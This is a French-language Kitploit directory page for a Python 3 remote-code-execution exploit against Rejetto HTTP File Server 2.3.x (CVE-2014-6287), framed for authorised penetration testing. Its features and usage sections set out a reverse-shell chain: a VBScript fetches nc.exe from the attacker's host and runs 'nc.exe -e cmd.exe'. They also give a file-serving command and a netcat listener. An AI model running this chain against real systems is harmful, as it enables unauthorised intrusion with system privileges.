Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit d'exécution de commandes à distance pour Rejetto HTTP File Server 2.3.x (CVE-2014-6287) réécrit en Python 3 pour les tests de sécurité offensive modernes. | Kitploit
Outils/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à Distance
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit d'exécution de commandes à distance pour Rejetto HTTP File Server 2.3.x (CVE-2014-6287) réécrit en Python 3 pour les tests de sécurité offensive modernes.

Voir le dépôt
3il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit d'exécution de commandes à distance HFS (CVE-2014-6287)

Il s'agit d'une réécriture en Python 3 de l'exploit classique d'exécution de commandes à distance (RCE) ciblant Rejetto HTTP File Server (HFS) v2.3.x, exploitant la vulnérabilité identifiée sous le nom de CVE-2014-6287.

Découvert à l'origine par Avinash Kumar Thapa alias « -Acid », cette version améliore la portabilité et la convivialité, en offrant une paramétrisation complète et une compatibilité moderne.


⚠️ Avertissement

Cet outil est fourni exclusivement à des fins éducatives et de tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.


📌 Détails de l'exploit

  • Vulnérabilité : Rejetto HFS v2.3.x - Exécution de commandes à distance
  • CVE : CVE-2014-6287
  • Impact : Exécution de code à distance avec privilèges système
  • Exigence : La cible doit exécuter une version vulnérable de HFS avec le scripting activé.

🚀 Fonctionnalités

  • Entièrement compatible avec
Python 3
  • Accepte tous les paramètres clés via la CLI :
    • IP et port cibles
    • IP locale (attaquant)
    • Port d'écoute pour le reverse shell
    • Port utilisé pour héberger nc.exe
  • Aucune valeur codée en dur
  • Livraison classique du reverse shell nc.exe à l'aide de VBScript
  • Déroulement de l'exploit :
    1. Téléverser un script VBS pour télécharger nc.exe
    2. Exécuter le script VBS sur la cible
    3. Exécuter nc.exe -e cmd.exe pour établir le reverse shell

  • 🛠️ Utilisation

    root@kitploit:~
    python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
    
    Example:
    python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
    
    Requirements:
      - HTTP server serving nc.exe:
          python3 -m http.server 8000
      - Listener:
          nc -lvnp 4444
    
    Télécharger l’outil